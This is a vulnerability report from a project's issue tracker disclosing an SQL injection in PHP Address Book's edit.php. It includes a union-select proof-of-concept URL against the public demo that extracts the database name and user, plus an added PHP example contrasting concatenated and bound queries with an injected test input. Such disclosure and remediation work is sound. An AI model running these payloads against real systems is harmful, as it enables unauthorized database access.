#163 SQL Injection Vulnerability

V8.1.xx
open
chatelao
None
9
2015-09-21
2015-09-21
No

Hello,

I have found an SQL injection vulnerability in PHP Address Book. Please patch this bug/vulnerability before someone misuses it.

Description:
The "id" field in edit.php is not properly sanitized, which leads to an SQL injection vulnerability.

Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union select 1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

I am in contact with the CERT regarding the same and issued a tracking id.

Suggested patch:
http://blogs.msdn.com/b/brian_swan/archive/2010/03/04/what_2700_s-the-right-way-to-avoid-sql-injection-in-php-scripts_3f00_.aspx

With Kind Regards,
Rahul Pratap Singh
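
The fix class the report points to (validate the `id` value and bind it as a parameter), shown as an added example that is not part of the original report or the project's code. The `contacts` table, its columns, and the function names are assumptions, since the page does not show the query used by edit.php; the example assumes the PDO SQLite driver is available.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's contact table.
// Table and column names are assumptions, not php-addressbook's real schema.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO contacts (id, name) VALUES (1, 'Alice'), (2, 'Bob')");

// "Before": the request value is concatenated into the SQL text, so the
// database parses whatever the client sent as part of the statement.
function findContactUnsafe(PDO $pdo, string $id): array
{
    return $pdo->query("SELECT id, name FROM contacts WHERE id = $id")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// "After": strict integer validation first, then a bound parameter, so the
// value can only ever be compared against the id column as data.
function findContactSafe(PDO $pdo, string $id): ?array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return null; // reject anything that is not a positive integer
    }
    $stmt = $pdo->prepare('SELECT id, name FROM contacts WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: one legitimate id and one that carries extra SQL.
foreach (['2', '2 OR 1=1'] as $id) {
    printf(
        "id=%-12s unsafe rows=%d safe=%s\n",
        var_export($id, true),
        count(findContactUnsafe($pdo, $id)),
        json_encode(findContactSafe($pdo, $id))
    );
}
```

With the second input the concatenated query returns every row, while the validated and bound version returns nothing.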
